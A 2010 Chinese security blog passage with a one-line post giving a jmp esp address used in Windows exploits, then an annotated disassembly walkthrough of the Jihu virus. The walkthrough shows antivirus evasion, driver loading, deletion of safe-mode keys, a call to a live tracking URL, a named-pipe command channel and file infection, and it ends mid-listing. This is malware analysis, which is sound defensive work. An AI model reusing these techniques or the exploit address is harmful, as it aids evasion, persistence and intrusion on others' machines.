零度x's blog

通杀中文2K,XP,2K3的jmp esp

零度x — Tue, 06 Jul 2010 03:50:07 +0000

做个记录~
地址：0×7ffa4512

极虎病毒样本分析2

零度x — Fri, 18 Jun 2010 19:12:47 +0000

继续上一次分析感染的dll

00871B9A  |.  6A 1C         push    1C                               ; /BufSize = 1C (28.)
00871B9C  |.  8D45 E4       lea     eax, dword ptr [ebp-1C]          ; |
00871B9F  |.  50            push    eax                              ; |Buffer
00871BA0  |.  FF75 E0       push    dword ptr [ebp-20]               ; |Address
00871BA3  |.  FF15 2C918700 call    dword ptr [<&KERNEL32.VirtualQue>; \VirtualQuery
00871BA9  |.  8B45 E8       mov     eax, dword ptr [ebp-18]          ;  VirTualQuery获取内存信息
00871BAC  |.  A3 38DC8700   mov     dword ptr [87DC38], eax
00871BB1  |.  6A 00         push    0                                ; /pModule = NULL
00871BB3  |.  FF15 04918700 call    dword ptr [<&KERNEL32.GetModuleH>; \GetModuleHandleA
00871BB9  |.  3B05 38DC8700 cmp     eax, dword ptr [87DC38]          ;   GetModuleHandle获取当前模块基址
00871BBF  |.  75 16         jnz     short 00871BD7                   ;  两者比较，相等执行loder部分功能,不相等则开始。。。 

008758E2  |.  6A 00         push    0                                ; /pThreadId = NULL
008758E4  |.  6A 00         push    0                                ; |CreationFlags = 0
008758E6  |.  6A 00         push    0                                ; |pThreadParm = NULL
008758E8  |.  68 9D538700   push    0087539D                         ; |ThreadFunction = appmgmts.0087539D
008758ED  |.  6A 00         push    0                                ; |StackSize = 0
008758EF  |.  6A 00         push    0                                ; |pSecurity = NULL
008758F1  |.  FF15 80918700 call    dword ptr [<&KERNEL32.CreateThre>; \CreateThread
008758F7  |>  33C0          xor     eax, eax                         ;  启动线程A

线程A：
查找卡巴和Defender的进程，如果存在就试图躲避杀毒软件查杀，然后以标准方式加载驱动，执行后删除，并且删除了安全模式，最后创建了6个线程。

00871681  |> \6A 00         push    0                                ; /hTemplateFile = NULL
00871683  |.  68 80000000   push    80                               ; |Attributes = NORMAL
00871688  |.  FFB5 E8FEFFFF push    dword ptr [ebp-118]              ; |Mode
0087168E  |.  6A 00         push    0                                ; |pSecurity = NULL
00871690  |.  6A 03         push    3                                ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00871692  |.  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
00871697  |.  68 08938700   push    00879308                         ; |FileName = "C:\DelInfo.bin"
0087169C  |.  FF15 C4908700 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
008716A2  |.  8985 ECFEFFFF mov     dword ptr [ebp-114], eax         ;  打开文件C:\DelInfo,bin
008717BA  |.  6A 00         push    0                                ; /pOverlapped = NULL
008717BC  |.  8D45 FC       lea     eax, dword ptr [ebp-4]           ; |
008717BF  |.  50            push    eax                              ; |pBytesRead
008717C0  |.  68 04010000   push    104                              ; |BytesToRead = 104 (260.)
008717C5  |.  8D85 F0FEFFFF lea     eax, dword ptr [ebp-110]         ; |
008717CB  |.  50            push    eax                              ; |Buffer
008717CC  |.  FFB5 ECFEFFFF push    dword ptr [ebp-114]              ; |hFile
008717D2  |.  FF15 EC908700 call    dword ptr [<&KERNEL32.ReadFile>] ; \ReadFile
008717D8  |.  FFB5 ECFEFFFF push    dword ptr [ebp-114]              ; /读取文件
008717DE  |.  FF15 10918700 call    dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00871812  |.  50            |push    eax                             ; /FileName
00871813  |.  FF15 18918700 |call    dword ptr [<&KERNEL32.DeleteFil>; \DeleteFileA
00871819  |.  83F8 01       |cmp     eax, 1                          ;  删除之前的loader
0087182A  |> \68 08938700   push    00879308                         ; /FileName = "C:\DelInfo.bin"
0087182F  |.  FF15 18918700 call    dword ptr [<&KERNEL32.DeleteFile>; \DeleteFileA
00871835  |.  8B85 F0FEFFFF mov     eax, dword ptr [ebp-110]         ;  删除C:\DelInfo.bin
00871125  |.  6A 00         push    0                                ; /ProcessID = 0
00871127  |.  6A 02         push    2                                ; |Flags = TH32CS_SNAPPROCESS
00871129  |.  E8 627D0000   call    ; \CreateToolhelp32Snapshot
0087112E  |.  8985 D0FEFFFF mov     dword ptr [ebp-130], eax
00871134  |.  8D85 D8FEFFFF lea     eax, dword ptr [ebp-128]
0087113A  |.  50            push    eax                              ; /lppe
0087113B  |.  FFB5 D0FEFFFF push    dword ptr [ebp-130]              ; |hSnapshot
00871141  |.  E8 3E7D0000   call       ; \Process32First
00871146  |>  FF75 08       /push    dword ptr [ebp+8]               ; /String2
00871149  |.  8D85 FCFEFFFF |lea     eax, dword ptr [ebp-104]        ; |
0087114F  |.  50            |push    eax                             ; |String1
00871150  |.  FF15 F0908700 |call    dword ptr [<&KERNEL32.lstrcmpiA>; \lstrcmpiA
00871156  |.  85C0          |test    eax, eax                        ;  查找卡巴和Defender
00871158  |.  75 0E         |jnz     short 00871168
0087115A  |.  8B85 E0FEFFFF |mov     eax, dword ptr [ebp-120]
00871160  |.  8985 D4FEFFFF |mov     dword ptr [ebp-12C], eax
00871166  |.  EB 16         |jmp     short 0087117E
00871168  |>  8D85 D8FEFFFF |lea     eax, dword ptr [ebp-128]
0087116E  |.  50            |push    eax                             ; /lppe
0087116F  |.  FFB5 D0FEFFFF |push    dword ptr [ebp-130]             ; |hSnapshot
00871175  |.  E8 107D0000   |call       ; \Process32Next
0087117A  |.  85C0          |test    eax, eax
0087117C  |.^ 75 C8         \jnz     short 00871146
0087117E  |>  FFB5 D0FEFFFF push    dword ptr [ebp-130]              ; /hObject
00871184  |.  FF15 10918700 call    dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
008754D7   .  68 18D48700   push    0087D418                         ; /Buffer = appmgmts.0087D418
008754DC   .  68 04010000   push    104                              ; |BufSize = 104 (260.)
008754E1   .  FF15 4C918700 call    dword ptr [<&KERNEL32.GetTempPat>; \GetTempPathA
008754E7   .  68 04010000   push    104                              ; /得到临时目录
008754FB   .  68 04010000   push    104                              ; /BufSize = 104 (260.)
00875500   .  68 20D58700   push    0087D520                         ; |Buffer = appmgmts.0087D520
00875505   .  FF15 B0908700 call    dword ptr [<&KERNEL32.GetSystemD>; \GetSystemDirectoryA
0087550B   .  68 04010000   push    104                              ; /得到系统目录
00871536   .  50            push    eax                              ; /ProcNameOrOrdinal = "LoadResource"
00871537   .  68 F0928700   push    008792F0                         ; |/pModule = "kernel32.dll"
0087153C   .  FF15 04918700 call    dword ptr [<&KERNEL32.GetModuleH>; |\GetModuleHandleA
00871542   .  50            push    eax                              ; |hModule
00871543   .  FF15 F4908700 call    dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00871549   .  8945 F8       mov     dword ptr [ebp-8], eax           ;  得到LoadResource地址
0087154C   .  68 00938700   push    00879300                         ; /ResourceType = "FILE"
00871551   .  0FB745 10     movzx   eax, word ptr [ebp+10]           ; |
00871555   .  50            push    eax                              ; |ResourceName
00871556   .  FF75 0C       push    dword ptr [ebp+C]                ; |hModule
00871559   .  FF15 C8908700 call    dword ptr [<&KERNEL32.FindResour>; \FindResourceA
0087155F   .  8945 E0       mov     dword ptr [ebp-20], eax          ;  查找资源
00871562   .  FF75 E0       push    dword ptr [ebp-20]               ; /hResource
00871565   .  FF75 0C       push    dword ptr [ebp+C]                ; |hModule
00871568   .  FF15 E8908700 call    dword ptr [<&KERNEL32.SizeofReso>; \SizeofResource
0087156E   .  8945 FC       mov     dword ptr [ebp-4], eax           ;  得到资源大小
00871571   .  FF75 E0       push    dword ptr [ebp-20]
00871574   .  FF75 0C       push    dword ptr [ebp+C]
00871577   .  FF55 F8       call    dword ptr [ebp-8]                ;  kernel32.LoadResource
0087157A   .  8945 BC       mov     dword ptr [ebp-44], eax          ;  加载资源
008715D3   .  6A 00         push    0                                ; /hTemplateFile = NULL
008715D5   .  FF75 14       push    dword ptr [ebp+14]               ; |Attributes
008715D8   .  6A 02         push    2                                ; |Mode = CREATE_ALWAYS
008715DA   .  6A 00         push    0                                ; |pSecurity = NULL
008715DC   .  6A 03         push    3                                ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
008715DE   .  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
008715E3   .  FF75 08       push    dword ptr [ebp+8]                ; |FileName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Forter.sys"
008715E6   .  FF15 C4908700 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
008715EC   .  8945 E8       mov     dword ptr [ebp-18], eax          ;  创建C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Forter.sys
0087533A  |.  68 3F000F00   push    0F003F
0087533F  |.  6A 00         push    0
00875341  |.  6A 00         push    0
00875343  |.  FF15 18908700 call    dword ptr [<&ADVAPI32.OpenSCMana>;  advapi32.OpenSCManagerA
00875349  |.  8945 FC       mov     dword ptr [ebp-4], eax           ;  打开SCM
0087534C  |.  6A 00         push    0                                ; /Password = NULL
0087534E  |.  6A 00         push    0                                ; |ServiceStartName = NULL
00875350  |.  6A 00         push    0                                ; |pDependencies = NULL
00875352  |.  6A 00         push    0                                ; |pTagId = NULL
00875354  |.  6A 00         push    0                                ; |LoadOrderGroup = NULL
00875356  |.  FF75 08       push    dword ptr [ebp+8]                ; |BinaryPathName
00875359  |.  6A 01         push    1                                ; |ErrorControl = SERVICE_ERROR_NORMAL
0087535B  |.  6A 03         push    3                                ; |StartType = SERVICE_DEMAND_START
0087535D  |.  6A 01         push    1                                ; |ServiceType = SERVICE_KERNEL_DRIVER
0087535F  |.  68 FF010F00   push    0F01FF                           ; |DesiredAccess = SERVICE_ALL_ACCESS
00875364  |.  68 44988700   push    00879844                         ; |DisplayName = "Forter"
00875369  |.  68 44988700   push    00879844                         ; |ServiceName = "Forter"
0087536E  |.  FF75 FC       push    dword ptr [ebp-4]                ; |hManager
00875371  |.  FF15 20908700 call    dword ptr [<&ADVAPI32.CreateServ>; \CreateServiceA
00875377  |.  8945 F8       mov     dword ptr [ebp-8], eax           ;  创建服务
0087537A  |.  6A 00         push    0
0087537C  |.  6A 00         push    0
0087537E  |.  FF75 F8       push    dword ptr [ebp-8]
00875381  |.  FF15 24908700 call    dword ptr [<&ADVAPI32.StartServi>;  advapi32.StartServiceA
00875387  |.  FF75 F8       push    dword ptr [ebp-8]                ;  标准方式加载驱动
0087538A  |.  FF15 00908700 call    dword ptr [<&ADVAPI32.CloseServi>;  advapi32.CloseServiceHandle
00875390  |.  FF75 FC       push    dword ptr [ebp-4]
00875393  |.  FF15 00908700 call    dword ptr [<&ADVAPI32.CloseServi>;  advapi32.CloseServiceHandle
0087559E   .  50            push    eax
0087559F   .  68 02000080   push    80000002
008755A4   .  FF95 D0F6FFFF call    dword ptr [ebp-930]              ;  shlwapi.SHDeleteKeyA
008755AA   .  8D85 C0F4FFFF lea     eax, dword ptr [ebp-B40]         ;  删除SYSTEM\CurrentControlSet\Services子键
008755B0   .  50            push    eax                              ; /FileName
008755B1   .  FF15 18918700 call    dword ptr [<&KERNEL32.DeleteFile>; \DeleteFileA
008755B7   .  68 04010000   push    104                              ; /删除C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Forter.sys
00871AA0  |.  50            push    eax                              ; /pHandle
00871AA1  |.  68 1F000200   push    2001F                            ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
00871AA6  |.  6A 00         push    0                                ; |Reserved = 0
00871AA8  |.  8D85 78FBFFFF lea     eax, dword ptr [ebp-488]         ; |
00871AAE  |.  50            push    eax                              ; |Subkey
00871AAF  |.  68 02000080   push    80000002                         ; |hKey = HKEY_LOCAL_MACHINE
00871AB4  |.  FF15 0C908700 call    dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00871ABA  |.  6A 04         push    4                                ; /打开SYSTEM\CurrentControlSet\Services\LOADDLL
00871ABC  |.  8D45 10       lea     eax, dword ptr [ebp+10]          ; |
00871ABF  |.  50            push    eax                              ; |Buffer
00871AC0  |.  6A 04         push    4                                ; |ValueType = REG_DWORD
00871AC2  |.  6A 00         push    0                                ; |Reserved = 0
00871AC4  |.  68 80948700   push    00879480                         ; |ValueName = "Start"
00871AC9  |.  FF75 BC       push    dword ptr [ebp-44]               ; |hKey
00871ACC  |.  FF15 08908700 call    dword ptr [<&ADVAPI32.RegSetValu>; \RegSetValueExA
00871AD2  |.  FF75 BC       push    dword ptr [ebp-44]               ; /设置Start键值为2
00871AD5  |.  FF15 10908700 call    dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
0087586E   > \6A 00         push    0                                ; /pThreadId = NULL
00875870   .  6A 00         push    0                                ; |CreationFlags = 0
00875872   .  6A 00         push    0                                ; |pThreadParm = NULL
00875874   .  68 63518700   push    00875163                         ; |ThreadFunction = appmgmts.00875163
00875879   .  6A 00         push    0                                ; |StackSize = 0
0087587B   .  6A 00         push    0                                ; |pSecurity = NULL
0087587D   .  FF15 80918700 call    dword ptr [<&KERNEL32.CreateThre>; \CreateThread
00875883   .  6A 00         push    0                                ; /创建线程A1
00875885   .  6A 00         push    0                                ; |CreationFlags = 0
00875887   .  6A 00         push    0                                ; |pThreadParm = NULL
00875889   .  68 4A378700   push    0087374A                         ; |ThreadFunction = appmgmts.0087374A
0087588E   .  6A 00         push    0                                ; |StackSize = 0
00875890   .  6A 00         push    0                                ; |pSecurity = NULL
00875892   .  FF15 80918700 call    dword ptr [<&KERNEL32.CreateThre>; \CreateThread
00875898   .  8D85 D8FEFFFF lea     eax, dword ptr [ebp-128]         ;  创建线程A2
0087694E  |.  6A 00         push    0                                ; /pThreadId = NULL
00876950  |.  6A 00         push    0                                ; |CreationFlags = 0
00876952  |.  6A 00         push    0                                ; |pThreadParm = NULL
00876954  |.  68 AB8C8700   push    00878CAB                         ; |ThreadFunction = appmgmts.00878CAB
00876959  |.  6A 00         push    0                                ; |StackSize = 0
0087695B  |.  6A 00         push    0                                ; |pSecurity = NULL
0087695D  |.  FF15 80918700 call    dword ptr [<&KERNEL32.CreateThre>; \CreateThread
00876963  |.  68 409B8700   push    00879B40                         ; /创建线程A3
00876968  |.  68 02000080   push    80000002                         ; |hKey = HKEY_LOCAL_MACHINE
0087696D  |.  FF15 F4918700 call    dword ptr [<&SHLWAPI.SHDeleteKey>; \SHDeleteKeyA
00876973  |.  68 749B8700   push    00879B74                         ; /SubKey = "SYSTEM\CurrentControlSet\Control\SafeBoot\Network"
00876978  |.  68 02000080   push    80000002                         ; |hKey = HKEY_LOCAL_MACHINE
0087697D  |.  FF15 F4918700 call    dword ptr [<&SHLWAPI.SHDeleteKey>; \SHDeleteKeyA
00876983  |.  833D 50B58700>cmp     dword ptr [87B550], -1           ;  删除安全模式
00871C0B  |.  68 04010000   push    104                              ; /BufSize = 104 (260.)
00871C10  |.  8D85 E8FEFFFF lea     eax, dword ptr [ebp-118]         ; |
00871C16  |.  50            push    eax                              ; |PathBuffer
00871C17  |.  FF75 08       push    dword ptr [ebp+8]                ; |hModule
00871C1A  |.  FF15 00918700 call    dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00871C20  |.  83A5 E0FEFFFF>and     dword ptr [ebp-120], 0           ;  获取加载自身的exe
00871C3F  |.  6A 00         |push    0                               ; /hTemplateFile = NULL
00871C41  |.  6A 00         |push    0                               ; |Attributes = 0
00871C43  |.  6A 03         |push    3                               ; |Mode = OPEN_EXISTING
00871C45  |.  6A 00         |push    0                               ; |pSecurity = NULL
00871C47  |.  6A 01         |push    1                               ; |ShareMode = FILE_SHARE_READ
00871C49  |.  68 00000080   |push    80000000                        ; |Access = GENERIC_READ
00871C4E  |.  8D85 E8FEFFFF |lea     eax, dword ptr [ebp-118]        ; |
00871C54  |.  50            |push    eax                             ; |FileName = "C:\tools\OllyICE\LOADDLL.EXE"
00871C55  |.  FF15 C4908700 |call    dword ptr [<&KERNEL32.CreateFil>; \CreateFileA
00871C5B  |.  8945 F4       |mov     dword ptr [ebp-C], eax          ;  打开exe
00871C70  |> \6A 00         push    0                                ; /pFileSizeHigh = NULL
00871C72  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hFile
00871C75  |.  FF15 24918700 call    dword ptr [<&KERNEL32.GetFileSiz>; \GetFileSize
00871C7B  |.  8945 F8       mov     dword ptr [ebp-8], eax           ;  获取文件大小
00871CEF  |.  6A 00         push    0                                ; /pOverlapped = NULL
00871CF1  |.  8D45 FC       lea     eax, dword ptr [ebp-4]           ; |
00871CF4  |.  50            push    eax                              ; |pBytesRead
00871CF5  |.  FF75 F8       push    dword ptr [ebp-8]                ; |BytesToRead
00871CF8  |.  FFB5 E4FEFFFF push    dword ptr [ebp-11C]              ; |Buffer
00871CFE  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hFile
00871D01  |.  FF15 EC908700 call    dword ptr [<&KERNEL32.ReadFile>] ; \ReadFile
00871D07  |.  FF75 F4       push    dword ptr [ebp-C]                ; /读取文件
00876B05  |.  6A 00         push    0
00876B07  |.  6A 00         push    0
00876B09  |.  6A 00         push    0
00876B0B  |.  68 24638700   push    00876324
00876B10  |.  6A 00         push    0
00876B12  |.  6A 00         push    0
00876B14  |.  FF55 FC       call    dword ptr [ebp-4]                ;  kernel32.CreateThread
00876B17  |>  833D 84C68700>cmp     dword ptr [87C684], 0            ;  创建线程A4
00876B20  |.  6A 00         push    0
00876B22  |.  6A 00         push    0
00876B24  |.  6A 00         push    0
00876B26  |.  68 988A8700   push    00878A98
00876B2B  |.  6A 00         push    0
00876B2D  |.  6A 00         push    0
00876B2F  |.  FF55 FC       call    dword ptr [ebp-4]                ;  kernel32.CreateThread
00876B32  |>  833D 88C68700>cmp     dword ptr [87C688], 0            ;  创建线程A5
00876B3B  |.  6A 00         push    0
00876B3D  |.  6A 00         push    0
00876B3F  |.  6A 01         push    1
00876B41  |.  68 DC858700   push    008785DC
00876B46  |.  6A 00         push    0
00876B48  |.  6A 00         push    0
00876B4A  |.  FF55 FC       call    dword ptr [ebp-4]                ;  kernel32.CreateThread
00876B4D  |>  833D 8CC68700>cmp     dword ptr [87C68C], 0            ;  创建线程A6

线程A1：
用IE打开http://tj.nba1001.net:7777/tj/mac.html 10秒后关闭

00875224  |.  50            push    eax                              ; /pProcessInfo
00875225  |.  8D85 98F9FFFF lea     eax, dword ptr [ebp-668]         ; |
0087522B  |.  50            push    eax                              ; |pStartupInfo
0087522C  |.  6A 00         push    0                                ; |CurrentDir = NULL
0087522E  |.  6A 00         push    0                                ; |pEnvironment = NULL
00875230  |.  68 00000004   push    4000000                          ; |CreationFlags = CREATE_DEFAULT_ERROR_MODE
00875235  |.  6A 01         push    1                                ; |InheritHandles = TRUE
00875237  |.  6A 00         push    0                                ; |pThreadSecurity = NULL
00875239  |.  6A 00         push    0                                ; |pProcessSecurity = NULL
0087523B  |.  8D85 E0F9FFFF lea     eax, dword ptr [ebp-620]         ; |
00875241  |.  50            push    eax                              ; |CommandLine
00875242  |.  6A 00         push    0                                ; |ModuleFileName = NULL
00875244  |.  FF15 3C918700 call    dword ptr [<&KERNEL32.CreateProc>; \CreateProcessA
0087524A  |.  83F8 01       cmp     eax, 1                           ;  用IE打开http://tj.nba1001.net:7777/tj/mac.html
0087524D  |. /75 31         jnz     short 00875280
0087524F  |. |FFB5 ECFEFFFF push    dword ptr [ebp-114]              ; /hObject
00875255  |. |FF15 10918700 call    dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
0087525B  |. |68 10270000   push    2710                             ; /Timeout = 10000. ms
00875260  |. |FF15 E4908700 call    dword ptr [<&KERNEL32.Sleep>]    ; \Sleep
00875266  |. |6A 00         push    0                                ; /延时10秒
00875268  |. |FFB5 E8FEFFFF push    dword ptr [ebp-118]              ; |hProcess
0087526E  |. |FF15 B4908700 call    dword ptr [<&KERNEL32.TerminateP>; \TerminateProcess
00875274  |. |FFB5 E8FEFFFF push    dword ptr [ebp-118]              ; /关闭IE
0087527A  |. |FF15 10918700 call    dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle

线程A2：

00871B08  |.  50            push    eax                              ; /pWSAData
00871B09  |.  68 02020000   push    202                              ; |RequestedVersion = 202 (2.2.)
00871B0E  |.  FF15 44928700 call    dword ptr [<&WS2_32.#115>]       ; \WSAStartup
00871B14  |>  8D85 68FEFFFF /lea     eax, dword ptr [ebp-198]
00871B1A  |.  50            |push    eax
00871B1B  |.  6A 00         |push    0
00871B1D  |.  6A 00         |push    0
00871B1F  |.  68 88948700   |push    00879488                        ;  ASCII "www.baidu.com"
00871B24  |.  FF15 48928700 |call    dword ptr [<&WS2_32.getaddrinfo>;  ws2_32.getaddrinfo
00871B2A  |.  85C0          |test    eax, eax                        ;  打开百度，估计测试网络
00872D1D  |.  68 80958700   push    00879580                         ; /FileName = "Wininet.dll"
00872D22  |.  FF15 40918700 call    dword ptr [<&KERNEL32.LoadLibrar>; \LoadLibraryA
00872D28  |.  8945 F4       mov     dword ptr [ebp-C], eax           ;  加载wininet.dll
00872D2B  |.  68 8C958700   push    0087958C                         ; /ProcNameOrOrdinal = "InternetOpenA"
00872D30  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hModule
00872D33  |.  FF15 F4908700 call    dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D39  |.  A3 4CDC8700   mov     dword ptr [87DC4C], eax
00872D3E  |.  68 9C958700   push    0087959C                         ; /ProcNameOrOrdinal = "InternetOpenUrlA"
00872D43  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hModule
00872D46  |.  FF15 F4908700 call    dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D4C  |.  A3 50DC8700   mov     dword ptr [87DC50], eax
00872D51  |.  68 B0958700   push    008795B0                         ; /ProcNameOrOrdinal = "HttpQueryInfoA"
00872D56  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hModule
00872D59  |.  FF15 F4908700 call    dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D5F  |.  A3 54DC8700   mov     dword ptr [87DC54], eax
00872D64  |.  68 C0958700   push    008795C0                         ; /ProcNameOrOrdinal = "InternetReadFileExA"
00872D69  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hModule
00872D6C  |.  FF15 F4908700 call    dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D72  |.  A3 58DC8700   mov     dword ptr [87DC58], eax
00872D77  |.  68 D4958700   push    008795D4                         ; /ProcNameOrOrdinal = "InternetCloseHandle"
00872D7C  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hModule
00872D7F  |.  FF15 F4908700 call    dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D85  |.  A3 5CDC8700   mov     dword ptr [87DC5C], eax
00872D8A  |.  68 E8958700   push    008795E8                         ; /ProcNameOrOrdinal = "InternetSetStatusCallback"
00872D8F  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hModule
00872D92  |.  FF15 F4908700 call    dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D98  |.  A3 60DC8700   mov     dword ptr [87DC60], eax          ;  获取一系列函数地址
008727D9   > \8D85 70FEFFFF lea     eax, dword ptr [ebp-190]
008727DF   .  50            push    eax                              ; /pWSAData
008727E0   .  68 02020000   push    202                              ; |RequestedVersion = 202 (2.2.)
008727E5   .  FF15 44928700 call    dword ptr [<&WS2_32.#115>]       ; \WSAStartup
008727EB   >  8D85 5CFEFFFF lea     eax, dword ptr [ebp-1A4]
008727F1   .  50            push    eax
008727F2   .  6A 00         push    0
008727F4   .  6A 00         push    0
008727F6   .  68 44958700   push    00879544                         ;  ASCII "www.xunlei.com"
008727FB   .  FF15 48928700 call    dword ptr [<&WS2_32.getaddrinfo>>;  ws2_32.getaddrinfo
00872801   .  85C0          test    eax, eax                         ;  测试网络?
00872812   > \FFB5 5CFEFFFF push    dword ptr [ebp-1A4]
00872818   .  FF15 50928700 call    dword ptr [<&WS2_32.freeaddrinfo>;  ws2_32.freeaddrinfo
0087281E   .  6A 40         push    40                               ; /释放了...
0087283C   .  68 54958700   push    00879554                         ;  ASCII "www.3-0B6F-415d-B5C7-832F0.com"
00872841   .  FF15 48928700 call    dword ptr [<&WS2_32.getaddrinfo>>;  ws2_32.getaddrinfo
00872847   .  85C0          test    eax, eax                         ;  打开www.3-0B6F-415d-B5C7-832F0.com
0087285B   .  50            push    eax
0087285C   .  8D85 18FEFFFF lea     eax, dword ptr [ebp-1E8]
00872862   .  50            push    eax
00872863   .  6A 00         push    0
00872865   .  8B85 5CFEFFFF mov     eax, dword ptr [ebp-1A4]
0087286B   .  FF70 10       push    dword ptr [eax+10]
0087286E   .  8B85 5CFEFFFF mov     eax, dword ptr [ebp-1A4]
00872874   .  FF70 18       push    dword ptr [eax+18]
00872877   .  FF95 60FEFFFF call    dword ptr [ebp-1A0]              ;  ws2_32.WSAAddressToStringA
0087287D   .  FFB5 5CFEFFFF push    dword ptr [ebp-1A4]              ;  地址转换成字符串
00872883   .  FF15 50928700 call    dword ptr [<&WS2_32.freeaddrinfo>;  ws2_32.freeaddrinfo
0087380C  |> \6A 00         push    0                                ; /pThreadId = NULL
0087380E  |.  6A 00         push    0                                ; |CreationFlags = 0
00873810  |.  6A 00         push    0                                ; |pThreadParm = NULL
00873812  |.  68 88358700   push    00873588                         ; |ThreadFunction = appmgmts.00873588
00873817  |.  6A 00         push    0                                ; |StackSize = 0
00873819  |.  6A 00         push    0                                ; |pSecurity = NULL
0087381B  |.  FF15 80918700 call    dword ptr [<&KERNEL32.CreateThre>; \CreateThread
00873821  |.  8945 F8       mov     dword ptr [ebp-8], eax           ;  创建线程
00873841  |.  A3 68DC8700   mov     dword ptr [87DC68], eax
00873846  |>  FF35 E4B58700 push    dword ptr [87B5E4]               ; /Timeout = 900000. ms
0087384C  |.  FF35 68DC8700 push    dword ptr [87DC68]               ; |hObject = NULL
00873852  |.  FF15 50918700 call    dword ptr [<&KERNEL32.WaitForSin>; \WaitForSingleObject
00873858  |.  85C0          test    eax, eax                         ;  等待线程结束

线程A3：
创建命名管道[url=file://\\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5]\\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5[/url]，听取命令。

00878CCC   .  6A 00         push    0                                ; /hTemplateFile = NULL
00878CCE   .  6A 00         push    0                                ; |Attributes = 0
00878CD0   .  6A 03         push    3                                ; |Mode = OPEN_EXISTING
00878CD2   .  6A 00         push    0                                ; |pSecurity = NULL
00878CD4   .  6A 00         push    0                                ; |ShareMode = 0
00878CD6   .  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
00878CDB   .  FF75 F4       push    dword ptr [ebp-C]                ; |FileName
00878CDE   .  FF15 C4908700 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00878CE4   .  8945 F0       mov     dword ptr [ebp-10], eax          ;  创建管道\\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A
00878D1C   > \6A 00         push    0
00878D1E   .  6A 00         push    0
00878D20   .  68 00010000   push    100
00878D25   .  68 00010000   push    100
00878D2A   .  6A 01         push    1
00878D2C   .  6A 06         push    6
00878D2E   .  6A 03         push    3
00878D30   .  FF75 F4       push    dword ptr [ebp-C]                ;  appmgmts.00879AC0
00878D33   .  FF15 68908700 call    dword ptr [<&KERNEL32.CreateName>;  kernel32.CreateNamedPipeA
00878D39   .  8945 F8       mov     dword ptr [ebp-8], eax           ;  创建命名管道\\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A
00878D41   .  6A 00         push    0
00878D43   .  FF75 F8       push    dword ptr [ebp-8]
00878D46   .  FF15 78908700 call    dword ptr [<&KERNEL32.ConnectNam>;  kernel32.ConnectNamedPipe
00878D4C   .  6A 00         push    0                                ; /等待连接~

线程A4：
感染exe,rar,htm,html,asp,aspx文件


0876E17   > \6A 00         push    0                                ; /hTemplateFile = NULL
00876E19   .  68 80000000   push    80                               ; |Attributes = NORMAL
00876E1E   .  6A 03         push    3                                ; |Mode = OPEN_EXISTING
00876E20   .  6A 00         push    0                                ; |pSecurity = NULL
00876E22   .  6A 00         push    0                                ; |ShareMode = 0
00876E24   .  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
00876E29   .  FF75 08       push    dword ptr [ebp+8]                ; |FileName
00876E2C   .  FF15 C4908700 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00876E32   .  8945 98       mov     dword ptr [ebp-68], eax          ;  打开文件
00876E51   .  6A 02         push    2                                ; /Origin = FILE_END
00876E53   .  6A 00         push    0                                ; |pOffsetHi = NULL
00876E55   .  6A 00         push    0                                ; |OffsetLo = 0
00876E57   .  FF75 98       push    dword ptr [ebp-68]               ; |hFile
00876E5A   .  FF15 28918700 call    dword ptr [<&KERNEL32.SetFilePoi>; \SetFilePointer
00876E60   .  8945 DC       mov     dword ptr [ebp-24], eax          ;  设置指针
00876E63   .  6A 00         push    0                                ; /MapName = NULL
00876E65   .  6A 00         push    0                                ; |MaximumSizeLow = 0
00876E67   .  6A 00         push    0                                ; |MaximumSizeHigh = 0
00876E69   .  6A 04         push    4                                ; |Protection = PAGE_READWRITE
00876E6B   .  6A 00         push    0                                ; |pSecurity = NULL
00876E6D   .  FF75 98       push    dword ptr [ebp-68]               ; |hFile
00876E70   .  FF15 74918700 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileMappingA
00876E84   > \68 00040000   push    400                              ; /MapSize = 400 (1024.)
00876E89   .  6A 00         push    0                                ; |OffsetLow = 0
00876E8B   .  6A 00         push    0                                ; |OffsetHigh = 0
